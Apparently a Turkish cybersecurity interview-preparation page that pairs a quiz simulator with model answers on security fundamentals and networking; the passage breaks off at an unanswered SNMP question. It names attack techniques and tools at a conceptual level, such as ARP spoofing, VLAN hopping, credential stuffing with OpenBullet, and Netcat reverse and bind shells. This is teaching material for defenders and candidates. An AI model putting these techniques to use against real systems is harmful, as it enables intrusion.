Mülakat Simülatörü
🎯  Siber Güvenlik Mülakat Hazırlığı

MÜLAKATA
HAZIR MISIN?

Gerçek sorular  ·  Detaylı cevaplar  ·  Kendini değerlendir

150+
Soru
9
Kategori
4
Mod
📖
Çalışma Modu
Kendi hızında ilerle,
cevabı istediğinde gör
🎯
Simülasyon Modu
Gerçek mülakat deneyimi,
süre sayacı aktif
🗣️
Gerçek Mülakat
Önce sen cevapla,
sonra anahtar noktaları gör
Seri Mod
10 soruluk hızlı tur,
daha kısa süre baskısı
Seviye
Mid odağı: çalışma mantığı, örnek ve trade-off anlat.
Zorluk
Kategori seçimini korur, soru havuzunu zorluğa göre daraltır.
Soru Sayısı
0 soru
Çalışma ve simülasyon modunda, seçili havuzdan kaç soru geleceğini buradan ayarlayabilirsin.
Kategori Seç
1 / 157
✓ 0 ✗ 0 — 0
// Sonuç
Toplam
Bildim
Yarısı
Bilmedim
📚 Öğrenme Bölümü
📚 Konu Seç
🔍 Hata Analizi
YANLIŞ
CEVAPLAR
// Eksik kalan konuları pekiştir
AltaySec Ekosistemi

Tüm Mülakat Soruları ve Cevapları

239 siber güvenlik mülakat sorusu ve örnek cevabı — kategoriye göre. Yukarıdaki interaktif simülatörle pratik yapabilir, aşağıdan tüm soruları inceleyebilirsiniz.

Genel

CIA üçlüsünü açıkla: Confidentiality, Integrity, Availability

Confidentiality (Gizlilik): Bilgiye sadece yetkili kişilerin erişebilmesi. Şifreleme, erişim kontrolleri ile sağlanır.

Integrity (Bütünlük): Verinin yetkisiz kişilerce değiştirilemez olması. Hash fonksiyonları, dijital imzalar ile doğrulanır.

Availability (Erişilebilirlik): Sisteme yetkili kullanıcıların ihtiyaç duyduğunda ulaşabilmesi. DDoS saldırıları bunu hedef alır.
ConfidentialityIntegrityAvailabilityÜçlü denge

Authentication ile Authorization arasındaki fark nedir?

Authentication (Kimlik Doğrulama): "Sen kimsin?" sorusunun cevabı. Kullanıcının iddia ettiği kişi olduğunu kanıtlamasıdır. Parola, biyometri, OTP bunun araçlarıdır.

Authorization (Yetkilendirme): "Ne yapabilirsin?" sorusunun cevabı. Kimliği doğrulanan kullanıcının hangi kaynaklara ne şekilde erişebileceğinin belirlenmesidir.

Örnek: Havalimanında pasaport kontrolü Authentication, boarding gate izni Authorization'dır.
AuthN vs AuthZKimlikYetkiOAuth

Risk, tehdit (threat) ve zafiyet (vulnerability) arasındaki fark nedir?

Threat (Tehdit): Sisteme zarar verme potansiyeli olan herhangi bir şey. Tehdit aktörü, doğal afet, insan hatası olabilir.

Vulnerability (Zafiyet): Sistemdeki bir zayıflık veya açık. Güvenlik açığı, yanlış yapılandırma, eski yazılım gibi.

Risk: Tehdidin zafiyeti istismar etme olasılığı × potansiyel etki.
Risk = Threat × Vulnerability × Impact
Risk formülüTehditZafiyetImpact

Defense in Depth nedir?

Tek bir güvenlik katmanına güvenmek yerine, birden fazla katmanlı savunma mekanizması kurmak anlamına gelir. Bir katman atlatılsa bile diğerleri korumayı sürdürür.

Katmanlar (içten dışa):
  • Data (şifreleme)
  • Application (güvenli kod)
  • Host (EDR, patch)
  • Network (firewall, IDS)
  • Perimeter (DMZ)
  • Physical (bina güvenliği)
  • Policies & Procedures
Katmanlı güvenlikLayered defenseTek nokta yok

Least Privilege prensibi nedir?

Her kullanıcıya, sisteme veya sürece görevini yapabilmesi için gereken minimum düzeyde izin verilmesi prensibidir.

Amacı: İhlal veya hata durumunda zararın yayılmasını sınırlamak.

Örnekler:
  • Web sunucusunun sadece web klasörüne yazma izni olması
  • DB kullanıcısının sadece ilgili tablolara erişimi
  • Admin hesaplarının günlük işlerde kullanılmaması
Minimum yetkiNeed-to-knowPrivilege creep önleme

Security through obscurity ne kadar güvenlidir?

Tanım: Sistemin güvenliğini tasarımının veya uygulamasının gizliliğine dayandırmak.

Sorun: Kerckhoffs Prensibi'ne göre sistem, algoritma hariç her şey düşman eline geçse bile güvenli olmalıdır.

Örnek: Port 22 yerine 2222 kullanmak saldırıyı engellemez, sadece geciktirir.

Sonuç: Ek bir savunma katmanı olarak kullanılabilir, ama asla birincil güvenlik mekanizması olmamalıdır.
Kerckhoffs prensibiGizlilik ≠ GüvenlikEk katman

DMZ (Demilitarized Zone) nedir ve neden kullanılır?

İç ağ ile dış ağ (internet) arasında konumlandırılan ayrı bir ağ segmentidir.

Amaç: Halka açık hizmetleri (web sunucusu, mail sunucusu) barındırırken iç ağı korumak.

Topoloji: İnternet → Dış Firewall → DMZ → İç Firewall → İç Ağ

DMZ'deki bir sunucu ele geçirilse bile iç ağa doğrudan erişim yoktur.
Ağ segmentiİki firewallHalka açık servisler

Zero Trust güvenlik modeli nedir?

"Never trust, always verify" prensibi üzerine kuruludur. Ağ içindeki veya dışındaki hiçbir kullanıcı/cihaz otomatik olarak güvenilir sayılmaz.

Temel ilkeler:
  • Her erişim talebini doğrula
  • En az ayrıcalık prensibi
  • İhlal varsayımı (assume breach)
  • Mikro-segmentasyon
Neden? Eski "castle and moat" modelinde içerideki her şey güvenilirdi. Bulut, uzak çalışma ve içeriden tehditler bunu geçersiz kıldı.
Never trust always verifyMikro-segmentasyonKimlik merkezli

Firewall, IDS ve IPS arasındaki fark nedir?

Firewall: Ağ trafiğini kurallara (IP, port, protokol) göre izin verir veya engeller. Pasif kural motoru.

IDS (Intrusion Detection System): Şüpheli trafiği algılar ve alarm üretir. Müdahale etmez, sadece bildirir.

IPS (Intrusion Prevention System): IDS'in üstüne kurulu, şüpheli trafiği otomatik engeller. Inline konumlanır.

Kısaca: Firewall kural bazlı süzer, IDS izler&raporlar, IPS izler&önler.
Firewall kuralIDS pasifIPS aktifInline vs out-of-band

VPN nasıl çalışır? Hangi protokolleri kullanır?

VPN, internet üzerinden şifreli bir tünel oluşturarak güvenli iletişim sağlar.

Protokoller:
  • OpenVPN – Açık kaynak, TLS tabanlı, güvenilir
  • WireGuard – Modern, hızlı, minimal kod tabanı
  • IPSec/IKEv2 – Kurumsal, native OS desteği
  • L2TP/IPSec – Eski, yavaş
  • PPTP – Güvensiz, kullanılmamalı
TünelŞifrelemeOpenVPNWireGuardIPSec

MFA (Multi-Factor Authentication) türleri ve zayıflıkları nelerdir?

MFA faktör türleri:
  • Something you know: Parola, PIN → Phishing, brute force ile çalınabilir
  • Something you have: SMS OTP, TOTP uygulaması, hardware token → SMS SIM-swap saldırısına açık
  • Something you are: Parmak izi, yüz tanıma → Deepfake, spoofing riskleri

Güçten zayıfa: Hardware key (FIDO2/WebAuthn) > Authenticator app > SMS OTP > Email OTP

Yaygın saldırılar: MFA fatigue (push bombing), real-time phishing proxy (Evilginx), SIM swap
SMS zayıfFIDO2 güçlüMFA fatigueSIM swapPhishing

Simetrik ve asimetrik şifreleme farkı nedir?

Simetrik: Şifreleme ve çözme için aynı anahtar kullanılır. Hızlıdır (AES, ChaCha20). Anahtar dağıtımı sorunludur.

Asimetrik: Public key ile şifreler, private key ile çözersin. Yavaştır (RSA, ECC). Anahtar dağıtım sorunu yoktur.

Pratikte: İkisi birlikte kullanılır. TLS'de asimetrik ile oturum anahtarı değişilir, sonra simetrikle iletişim devam eder (hybrid encryption).
AES simetrikRSA asimetrikHybridAnahtar dağıtımı

OWASP Top 10 nedir, hangileri var?

Web uygulama güvenliğindeki en kritik 10 riski sıralayan referans listedir (2021):
  • A01 Broken Access Control
  • A02 Cryptographic Failures
  • A03 Injection (SQLi, XSS...)
  • A04 Insecure Design
  • A05 Security Misconfiguration
  • A06 Vulnerable & Outdated Components
  • A07 Identification & Authentication Failures
  • A08 Software & Data Integrity Failures
  • A09 Security Logging & Monitoring Failures
  • A10 SSRF
A01-A10Web uygulamaReferans liste

Penetrasyon testi ile vulnerability assessment farkı nedir?

Vulnerability Assessment: Sistemdeki zafiyetleri tarayıp listelemektir. Genellikle otomatik araçlarla (Nessus, OpenVAS) yapılır. İstismar edilmez, sadece tespit edilir.

Penetrasyon Testi: Zafiyetleri gerçekten istismar ederek bir saldırganın nereye kadar ulaşabileceğini göstermektir. Manuel, daha derin ve hedef odaklıdır.

Kısaca: Vuln Assessment ≈ harita, Pentest ≈ gerçek saldırı simülasyonu.
Tespit vs istismarNessus vs MetasploitDerinlik farkı

Social engineering nedir? Hangi türleri var?

İnsan psikolojisini manipüle ederek hassas bilgi elde etme veya zararlı eylem yaptırma tekniğidir.

Türleri:
  • Phishing: Sahte email ile kimlik bilgisi çalma
  • Spear Phishing: Hedefe özel kişiselleştirilmiş phishing
  • Vishing: Sesli arama ile sosyal mühendislik
  • Smishing: SMS ile phishing
  • Pretexting: Sahte kimlik/senaryo oluşturma
  • Baiting: USB bırakma, sahte indirme linkleri
  • Tailgating: Fiziksel alanlara yetkisiz giriş
PhishingVishingPretextingBaitingİnsan faktörü

Non-repudiation (İnkâr edilemezlik) nedir?

Bir tarafın gerçekleştirdiği eylemi sonradan inkâr edememesi ilkesidir.

Nasıl sağlanır:
  • Dijital imza: Özel anahtarla imzalanan belge — sadece o kişi imzalayabilir
  • Audit log: Değiştirilemez log kaydı
  • Zaman damgası: Güvenilir üçüncü taraftan
Örnek: E-posta inkâr edilemezliği (S/MIME imzalı email), e-devlet imzaları.
Dijital imzaAudit logZaman damgasıCIA+NE-imza

Threat modeling nedir? STRIDE nedir?

Bir sisteme yönelik potansiyel tehditleri sistematik olarak tanımlama sürecidir.

STRIDE:
  • Spoofing – kimlik sahteciliği
  • Tampering – veri değiştirme
  • Repudiation – inkâr etme
  • Information Disclosure – bilgi ifşası
  • Denial of Service – servis reddi
  • Elevation of Privilege – yetki yükseltme
Araçlar: Microsoft Threat Modeling Tool, OWASP Threat Dragon
STRIDESpoofingTamperingElevation of PrivilegeSecure design

GDPR / KVKK hakkında ne biliyorsunuz?

GDPR: AB vatandaşlarının kişisel verilerini koruyan 2018 tarihli yönetmelik. İhlalde ciro'nun %4'üne kadar ceza.

KVKK: Türkiye'nin 2016 tarihli kişisel veri koruma kanunu.

Ortak ilkeler: Açık rıza, veri minimizasyonu, unutulma hakkı, ihlal bildirim yükümlülüğü (72 saat içinde)
GDPRKVKK72 saat bildirimiAçık rıza

Brute force, dictionary ve credential stuffing saldırıları arasındaki fark nedir?

Brute Force: Tüm olası kombinasyonları dener. Parolası kısa ise işe yarar. Yavaş ama kapsamlı.

Dictionary Attack: Yaygın parola listesiyle (rockyou.txt gibi) dener. Brute force'tan çok daha hızlı, gerçekçi parolaları hedefler.

Credential Stuffing: Önceki veri ihlallerinden sızdırılmış kullanıcı adı + parola çiftlerini başka servislere dener. Parola yeniden kullanımını (reuse) istismar eder. Otomasyon araçlarıyla (Sentry MBA, OpenBullet) saniyede binlerce deneme.

Önlem: MFA, rate limiting, breached password check (HaveIBeenPwned API), account lockout.
Rockyou.txtCredential stuffingParola reuseHaveIBeenPwnedRate limiting

Bug bounty programı nedir ve nasıl çalışır?

Şirketlerin güvenlik araştırmacılarını sistemlerindeki zafiyetleri bulmaya ve sorumlu biçimde bildirmeye davet ettiği programdır.

Nasıl çalışır: Kapsam (scope) tanımlanır → Araştırmacılar test eder → Zafiyet raporlanır → Kapsam ve kritikliğe göre para ödülü verilir

Platformlar: HackerOne, Bugcrowd, Intigriti

Önemli: Kapsam dışına çıkmak, yasal sorun yaratır. Her şey responsible disclosure çerçevesinde olmalıdır.
HackerOneResponsible disclosureScopeÖdül

Responsible disclosure süreci nasıl işler?

Bulunan bir güvenlik açığını kamuoyuna açıklamadan önce etkilenen kuruluşa bildirme ve düzeltme için süre tanıma pratiğidir.

Süreç:
  1. Zafiyet tespit edilir
  2. Kuruluşun güvenlik ekibine gizlice bildirilir
  3. Düzeltme için süre tanınır (genellikle 90 gün — Google Project Zero standardı)
  4. Süre sonunda yama yayınlandıysa kamuoyu bilgilendirilir
  5. Yama yayınlanmadıysa "coordinated disclosure" veya "full disclosure" kararı verilir
90 günKoordineli açıklamaCVEGoogle Project Zero

SOC 2 ve ISO 27001 nedir?

ISO 27001: Bilgi güvenliği yönetim sistemi (BGYS) için uluslararası standart. 114 kontrol, risk yönetim odaklı, sertifikasyon mümkün. Genellikle B2B güven için gerekli.

SOC 2 (System and Organization Controls): AICPA tarafından tanımlanmış. 5 Trust Service Criteria: Security, Availability, Processing Integrity, Confidentiality, Privacy.
  • SOC 2 Type I: Belirli bir anda kontrollerin varlığı
  • SOC 2 Type II: Belirli bir dönem boyunca etkinliği (daha değerli)
Fark: ISO 27001 kural/süreç odaklı sertifika, SOC 2 denetim raporu. ABD'de SOC 2, Avrupa'da ISO 27001 daha yaygın.
ISO 27001SOC 2 Type IITrust Service CriteriaSertifikasyonBGYS

PCI DSS nedir? Kimin için gereklidir?

PCI DSS (Payment Card Industry Data Security Standard): Kart sahibi verilerini işleyen, depolayan veya ileten tüm kuruluşları kapsayan güvenlik standardı. Visa, Mastercard, Amex gibi kartın ağları tarafından zorunlu tutulur.

12 temel gereklilik (özet):
  • Güvenli ağ kurulumu (Firewall)
  • Kart sahibi verilerini koruma
  • Şifreleme
  • Sızma testi (yılda en az bir kez)
  • Erişim kontrolü
  • Düzenli izleme ve test
Uyumsuzluk: Para cezası, kart kabul izninin iptali, ihlal sonrası yüksek ceza.
Kart verisi12 gereklilikPentest zorunluVisa/MastercardUyumsuzluk cezası

SIEM nedir ve ne işe yarar?

SIEM (Security Information and Event Management): Farklı kaynaklardan (firewall, IDS, sunucu, uygulama) gelen log ve event verilerini merkezi olarak toplayan, korelasyon yapan ve gerçek zamanlı alarm üreten platformdur.

İki temel fonksiyon:
  • SIM (Security Information Management): Log toplama, saklama, raporlama
  • SEM (Security Event Management): Gerçek zamanlı olay korelasyonu ve alarm
Popüler araçlar: Splunk, IBM QRadar, Microsoft Sentinel, Elastic SIEM

Kullanım örneği: Bir kullanıcı 5 dakikada 10 farklı ülkeden giriş denemeleri yapıyorsa SIEM bunu korele edip SOC analistini uyarır.
Log korelasyonuGerçek zamanlı alarmSplunkQRadarSOC

SOAR nedir? SIEM ile farkı nedir?

SOAR (Security Orchestration, Automation and Response): Güvenlik operasyonlarını otomatize eden, farklı güvenlik araçlarını entegre eden ve olay müdahalesini hızlandıran platformdur.

SIEM vs SOAR:
  • SIEM: Tespit eder ve alarm üretir — "Bu şüpheli!"
  • SOAR: Tespit sonrası otomatik aksiyon alır — "IP'yi engelle, ticket aç, SOC'u bilgilendir"
Örnek otomasyon: Phishing maili tespit edildi → sandbox'a gönder → URL'i kara listeye al → kullanıcıya bildirim gönder → ticket aç. Bunların hepsi saniyeler içinde otomatik.

Araçlar: Palo Alto XSOAR, Splunk SOAR, IBM Resilient
OtomasyonOrchestrationPlaybookSIEM entegrasyonuMüdahale hızı

CVE ve CVSS nedir?

CVE (Common Vulnerabilities and Exposures): Bilinen güvenlik açıklarına atanan standart kimlik numarasıdır. Örn: CVE-2021-44228 (Log4Shell). MITRE tarafından yönetilir.

CVSS (Common Vulnerability Scoring System): Zafiyetin kritikliğini 0-10 arası puanlayan sistemdir.
  • 0.1–3.9 → Düşük
  • 4.0–6.9 → Orta
  • 7.0–8.9 → Yüksek
  • 9.0–10.0 → Kritik
CVSS Bileşenleri: Attack Vector, Attack Complexity, Privileges Required, User Interaction, Scope, Confidentiality/Integrity/Availability Impact

Önemli not: CVSS skoru bağlamdan bağımsızdır; organizasyon için gerçek risk farklı olabilir.
CVE IDCVSS 0-10KritiklikMITRELog4Shell örneği

Vulnerability Management süreci nasıl işler?

Döngüsel 5 aşamalı süreç:
  1. Asset Discovery: Ağdaki tüm varlıkları tespit et
  2. Vulnerability Scanning: Nessus, Qualys, OpenVAS ile zafiyet tara
  3. Risk Prioritization: CVSS + iş etkisi + exploit availability ile önceliklendir
  4. Remediation: Patch, workaround veya compensating control uygula
  5. Verification: Düzeltmenin çalıştığını doğrula, tekrar tara
Kritik kavramlar:
  • Patch window: Kritik: 24-72 saat, Yüksek: 7 gün, Orta: 30 gün
  • Exception management: Patch uygulanamıyorsa risk kabulü ve telafi kontrolü
NessusQualysPatch windowRisk önceliklendirmeDöngüsel süreç

Separation of Duties (Görev Ayrımı) nedir?

Kritik bir işlemin tek bir kişi tarafından başlatılmasını, onaylanmasını ve tamamlanmasını engelleyen güvenlik prensibidir.

Amaç: İç tehdit ve hata riskini azaltmak. Bir kişinin tüm sürece hâkim olması durumunda dolandırıcılık veya hata gizlenebilir.

Örnekler:
  • Kod yazan kişi canlıya alamaz — başka biri onaylar
  • Ödeme oluşturan kişi ödemeyi onaylayamaz
  • Backup yapan kişi restore testini yapmalı, doğrulaması başkası
BT güvenliğinde: Privileged access yönetiminde, change management süreçlerinde zorunludur.
İç tehditFraud önlemeDual controlChange managementPAM

Network

TCP ve UDP farkı nedir? Güvenlik açısından hangisi daha riskli?

TCP: Bağlantı odaklı, 3-way handshake, paket sırası ve kayıp kontrolü var.

UDP: Bağlantısız, hızlı ama güvenilmez. DNS, DHCP, VoIP kullanır.

Güvenlik açısından UDP daha riskli:
  • Stateless → Amplification saldırılarına açık
  • DNS amplification, NTP amplification UDP kullanan DDoS vektörleridir
  • Kaynak IP sahteciliği (IP spoofing) UDP'de çok daha kolay
Stateful TCPStateless UDPAmplificationSpoofing

TCP three-way handshake'i adım adım anlat

Adım 1 — SYN: İstemci, sunucuya SYN paketi gönderir. ISN belirlenir.

Adım 2 — SYN-ACK: Sunucu alındılar ve kendi SYN'ini gönderir.

Adım 3 — ACK: İstemci sunucunun SYN'ini alındılar. Bağlantı kurulur.

Güvenlik notu: SYN flood'da saldırgan çok sayıda SYN gönderip ACK dönmez → sunucu half-open bağlantılarla dolar → DoS.
Önlem: SYN cookies
SYNSYN-ACKACKSYN floodSYN cookie

DNS nasıl çalışır? DNS poisoning nedir?

DNS: Alan adlarını IP adreslerine çeviren dağıtık hiyerarşik sistemdir. İstemci → Recursive Resolver → Root NS → TLD NS → Authoritative NS sıralamasıyla çalışır.

DNS Poisoning: DNS önbelleğine sahte kayıt enjekte etmektir. Kullanıcı example.com yazınca saldırganın IP'sine yönlendirilir.

Korunma: DNSSEC — DNS yanıtlarını kriptografik olarak imzalar.
Recursive resolverCache poisoningDNSSECHiyerarşik

OSI modeli katmanlarını güvenlik açısından açıkla

  • L7 Application: XSS, SQLi, phishing
  • L6 Presentation: SSL stripping, şifreleme sorunları
  • L5 Session: Session hijacking, cookie theft
  • L4 Transport: SYN flood, port scanning
  • L3 Network: IP spoofing, BGP hijack
  • L2 Data Link: ARP spoofing, MAC flooding, VLAN hopping
  • L1 Physical: Fiziksel erişim, kablo dinleme
L2 ARPL3 IP spoofingL4 SYN floodL7 XSS

ARP protokolü nedir? ARP spoofing nasıl yapılır?

ARP: IP adresini MAC adresine çevirmek için kullanılır. "192.168.1.1 kimin?" diye broadcast gönderilir.

ARP Spoofing: Saldırgan sahte ARP yanıtları göndererek "Gateway'in MAC adresi benim" der. Tüm trafik saldırgan üzerinden geçer → MITM.

Araç: Bettercap, arpspoof

Korunma: Dynamic ARP Inspection (DAI), static ARP, port security
MAC resolutionMITMBettercapDAIBroadcast

HTTPS ile HTTP farkı nedir? TLS handshake nasıl çalışır?

HTTP: Şifresiz, düz metin iletişim.
HTTPS: HTTP + TLS. Şifreli, kimlik doğrulamalı.

TLS 1.3 Handshake:
  1. Client Hello: TLS sürümleri, cipher suites, random
  2. Server Hello: seçilen cipher, sertifika, DH key share
  3. İstemci sertifikayı doğrular (CA zinciri)
  4. Shared secret türetilir → session keys
  5. Şifreli iletişim başlar
TLS 1.3Cipher suiteDH key exchangeCA sertifika

Man-in-the-Middle (MITM) saldırısı nedir ve nasıl önlenir?

Saldırgan, iki taraf arasındaki iletişime gizlice yerleşir; trafiği okuyabilir, değiştirebilir ve iletebilir.

Yöntemler: ARP spoofing, DNS spoofing, rogue Wi-Fi, SSL stripping

Önlemler:
  • HTTPS + HSTS header
  • Sertifika pinning
  • VPN (özellikle public Wi-Fi'da)
  • DNSSEC
  • Dynamic ARP Inspection
ARP spoofingSSL strippingHSTSCert pinningRogue Wi-Fi

DDoS saldırısı türleri nelerdir? Nasıl mitigate edilir?

Volumetric: Bant genişliğini doldurur. UDP flood, DNS amplification (~50-70x amplification factor)

Protocol: Network katmanını tüketir. SYN flood, fragmented packet attacks

Application Layer (L7): Uygulama kaynaklarını tüketir. HTTP flood, Slowloris

Mitigation:
  • Cloudflare, Akamai scrubbing center
  • Rate limiting, SYN cookies
  • Anycast diffusion
  • WAF (L7 için)
VolumetricProtocolL7AmplificationScrubbing

SSL stripping saldırısı nasıl çalışır?

Saldırgan MITM konumuna geçerek:
  1. Kurbanın HTTPS isteğini HTTP'ye düşürür
  2. Sunucuyla HTTPS konuşmaya devam eder
  3. Kurban şifresiz iletişim kurar, sunucu HTTPS kullandığını sanır
Sonuç: Şifreler açık iletilir.
Önlem: HSTS — tarayıcıya "bu siteye her zaman HTTPS ile bağlan" talimatı.
HTTPS→HTTPHSTSMITM

BGP hijacking nedir?

BGP, internetin yönlendirme protokolüdür. Kötü niyetli AS, başkasına ait IP bloklarını kendi ilanı gibi duyurur → trafik yanlış yere yönlenir.

Örnekler: 2018 Amazon Route 53 BGP hijack (kripto para çalındı), Pakistan Telecom 2008 YouTube kesintisi

Önlem: RPKI — prefix sahipliğini kriptografik olarak doğrular.
AS prefixRPKIRota manipülasyonu

Port scanning nedir? Nmap ile hangi tarama türleri yapılır?

Bir hedef sistemdeki açık port ve servisleri keşfetmek için bağlantı denemeleri yapma işlemi.

Nmap tarama türleri:
  • -sS SYN scan (stealth): SYN gönder, RST ile kapat. Log bırakmaz.
  • -sT TCP connect: Tam bağlantı, daha gürültülü
  • -sU UDP scan
  • -sV Version detection
  • -O OS detection
  • -A Aggressive: OS+versiyon+script
  • -p- Tüm 65535 port
SYN scanStealth-sV-ONmap NSE

Packet sniffing nedir? Wireshark ile neler yapılabilir?

Ağ üzerindeki paketleri yakalayıp analiz etme işlemi. Promiscuous mode'da NIC tüm paketleri yakalar.

Wireshark ile:
  • Protokol analizi (TCP, DNS, HTTP, TLS)
  • Şifresiz trafik içerik analizi
  • TCP akışları izleme (Follow stream)
  • IOC tespiti (şüpheli IP, domain)
  • Malware trafik analizi
Filtre örnekleri: http, tcp.port==443, ip.addr==192.168.1.1
Promiscuous modeProtocol analysisFollow TCP stream

VLAN nedir ve network segmentation'da rolü nedir?

Fiziksel olarak aynı switch'e bağlı cihazları mantıksal olarak ayrı ağlara bölme teknolojisi.

Güvenlik faydaları:
  • Lateral movement sınırlanır
  • Broadcast domain küçülür
  • Misafir, üretim, yönetim ağları ayrıştırılır
VLAN hopping saldırısı: 802.1Q double-tagging veya DTP saldırısıyla farklı VLAN'a sıçrama.
Önlem: DTP'yi kapat, native VLAN değiştir.
SegmentasyonLateral movementVLAN hoppingDTP802.1Q

HTTPS trafiği şifreli olduğuna göre SOC nasıl izler?

TLS Inspection: Kurumsal proxy araya girerek sertifikayı yeniden imzalar → içerik incelenebilir.

Metadata analizi (şifresiz):
  • JA3/JA3S fingerprint: TLS handshake özelliklerinden C2 tespiti
  • SNI: Hangi domain'e gidildiği handshake'de açık görünür
  • Bağlantı süresi, paket boyutu, timing: C2 beacon tespiti
  • Certificate anomali: self-signed, şüpheli CN
TLS inspectionJA3 fingerprintSNIBeacon tespiti

IDS imza tabanlı vs anomaly tabanlı tespit farkı nedir?

İmza tabanlı: Bilinen saldırı pattern'larını tanır (Snort kuralları). Düşük false positive. Sıfır gün yakalayamaz.

Anomaly tabanlı: Baseline'dan sapmaları tespit eder. Sıfır gün yakalayabilir. Yüksek false positive (özellikle başlangıçta).

Modern IDS/IPS: İkisini birleştirir. Snort/Suricata imza + ML motoru.
İmza tabanlıAnomaly tespitZero-daySnort

HTTPS ile HTTP arasındaki fark nedir? TLS handshake nasıl çalışır?

HTTP: Şifresiz, düz metin iletişim. Araya giren herkes okuyabilir.
HTTPS: HTTP + TLS. Şifreli, kimlik doğrulamalı.

TLS Handshake (TLS 1.3):
  1. Client Hello: desteklenen TLS sürümleri, cipher suites, random
  2. Server Hello: seçilen cipher, sertifika, Diffie-Hellman key share
  3. İstemci sertifikayı doğrular (CA zinciri)
  4. Shared secret türetilir → session keys oluşturulur
  5. Şifreli iletişim başlar
TLS 1.3Cipher suiteDH key exchangeCA sertifikaMITM önleme

NAT nasıl çalışır? Güvenlik sağlar mı?

NAT (Network Address Translation): İç ağdaki özel IP adreslerini dışarıya tek bir public IP olarak gösterir. Router bağlantı tablosunu tutar.

Güvenlik sağlar mı? Kısmen. NAT doğası gereği dışarıdan başlatılan bağlantıları engeller (implicit firewall etkisi). Ancak:
  • Gerçek bir firewall değildir, kural tabanlı değil
  • İçeriden başlatılan zararlı trafik geçer
  • NAT traversal teknikleri bunu aşabilir
NAT'a güvenmek, gerçek güvenlik önlemlerinin yetersizliğini maskeler.
Özel IPImplicit firewallRFC 1918Kısmi koruma

IPv6'nın güvenlik farkları nelerdir?

Olumlu farklar:
  • IPSec zorunlu (protokol düzeyinde)
  • NAT gerekmez → end-to-end şifreleme kolaylaşır
  • Adres uzayı büyüklüğü host keşfini zorlaştırır
Olumsuz/yeni riskler:
  • NDP (Neighbor Discovery Protocol) → ARP spoofing'in IPv6 karşılığı: NDP spoofing
  • SLAAC + RA (Router Advertisement) poisoning saldırıları
  • IPv6 trafiği çoğu kuruluşta izlenmez (blind spot)
  • Dual-stack sistemlerde IPv4 güvenliği varken IPv6 ihmal edilebilir
IPSec nativeNDP spoofingRA poisoningDual-stack riski

DNS over HTTPS (DoH) güvenlik açısından ne anlama gelir?

DNS sorgularını HTTPS üzerinden şifreleyerek ISP veya ağ dinleyicilerinden gizler.

Güvenlik artıları:
  • DNS hijacking ve DNS poisoning'e karşı koruma
  • ISP DNS izlemesini engeller
  • Hassas DNS sorgularını gizler
SOC/Blue Team açısından zorluğu:
  • DNS trafiği artık görünmez → DNS tabanlı C2 veya exfiltration tespiti zorlaşır
  • DNS sinkhol çalışmaz
  • Geleneksel DNS güvenlik araçları (RPZ, DNS firewall) etkisiz kalabilir
Kurumsal çözüm: DoH endpoint'lerini blokla, kurumsal DNS resolver zorunlu kıl (split-horizon DNS).
DoHDNS şifrelemeC2 gizlemeDNS sinkholKurumsal DNS enforcement

Netflow / IPFIX nedir? Güvenlikte nasıl kullanılır?

Ağ trafiğinin metadata'sını (tam içerik değil) toplayan protokol. Cisco'nun NetFlow'u, standartlaştırılmış versiyonu IPFIX.

Kayıt edilen bilgiler: Kaynak/hedef IP, port, protokol, byte/paket sayısı, süre, TCP flag'leri

Güvenlik kullanım alanları:
  • DDoS tespiti: Anormal trafik hacmi
  • Port tarama tespiti: Tek kaynaktan çok hedefe
  • Lateral movement: İç ağda alışılmadık SMB/RDP bağlantıları
  • Data exfiltration: Büyük çıkış trafiği
  • Botnet C2: Düzenli beacon trafik deseni
Araçlar: ntopng, nfdump, Elastic Flow
Trafik metadataDDoS tespitLateral movementExfiltrationntopng

VLAN nedir? VLAN hopping saldırısı nasıl çalışır?

VLAN (Virtual LAN): Fiziksel olarak aynı ağda bulunan cihazları mantıksal olarak birbirinden izole eden teknolojidir. Broadcast domain'i böler, güvenlik ve performans sağlar.

VLAN Hopping — 2 yöntem:
1. Switch Spoofing: Saldırgan, switch gibi davranarak 802.1Q trunk bağlantısı kurar ve tüm VLAN trafiğine erişir.
2. Double Tagging: İki VLAN etiketi ekleyerek native VLAN'dan başka VLAN'a paket geçirir.

Korunma:
  • Native VLAN'ı kullanılmayan bir VLAN ID ile değiştir
  • DTP (Dynamic Trunking Protocol) kapat
  • Kullanılmayan portları kapatıp "parking VLAN"a at
802.1QTrunk portDouble taggingDTPNative VLAN

NAT nedir? Güvenlik açısından avantaj ve dezavantajları nelerdir?

NAT (Network Address Translation): Özel IP adreslerini internete çıkarken genel IP'ye çeviren mekanizmadır.

Güvenlik Avantajları:
  • İç ağ topolojisini dışarıdan gizler
  • Doğrudan dış erişimi engeller (implicit firewall etkisi)
  • IPv4 adres tasarrufu sağlar
Güvenlik Dezavantajları/Yanılgıları:
  • NAT bir firewall değildir — gelen bağlantıları filtrelemez, sadece çevirir
  • İçeriden başlatılan her bağlantı geçer (outbound kontrolü yoktur)
  • Log analizi ve forensics'i zorlaştırır (kaynak IP gizlenir)
  • End-to-end connectivity bozulur
IP maskingImplicit firewall yanılgısıOutbound kontrolForensics zorluğuPAT

DNS over HTTPS (DoH) ve DNS over TLS (DoT) nedir?

Geleneksel DNS sorguları plaintext'tir — ISP, ağ yöneticisi veya MITM saldırganları trafiği görebilir ve manipüle edebilir.

DoH (DNS over HTTPS): DNS sorgularını port 443 üzerinden HTTPS ile şifreler. Web trafiğine karışır, tespit edilmesi zordur.
DoT (DNS over TLS): DNS sorgularını port 853 üzerinden TLS ile şifreler. Ayrı port kullandığı için ağda bloke edilebilir.

Güvenlik açısından:
  • DNS poisoning'e karşı koruma sağlar
  • Gizlilik artar
  • Ancak kurumsal ağlarda DNS filtrelemeyi zorlaştırır (güvenlik bypass riski)
Şifreli DNSPort 443Port 853MITM önlemeKurumsal sorunlar

Netcat nedir? Güvenlik bağlamında nasıl kullanılır?

"TCP/IP'nin İsviçre çakısı" olarak bilinir. TCP/UDP bağlantıları açabilen, veri transfer edebilen, dinleyici (listener) başlatabilen güçlü bir ağ aracıdır.

Güvenlik kullanımları:
  • Banner grabbing: nc target.com 80 → HTTP header'ları topla
  • Port scanning: nc -zv host 20-100
  • Reverse shell: Hedef → saldırgana bağlantı açar (outbound firewall bypass)
  • Bind shell: Hedef portu açar, saldırgan bağlanır
  • Dosya transfer: İki sistem arasında netcat ile dosya aktar
Blue team notu: Netcat trafiği plaintext; EDR ve ağ monitöründe kolayca yakalanır.
TCP/UDPBanner grabbingReverse shellBind shellnc komutu

SNMP nedir? Güvenlik riskleri nelerdir?

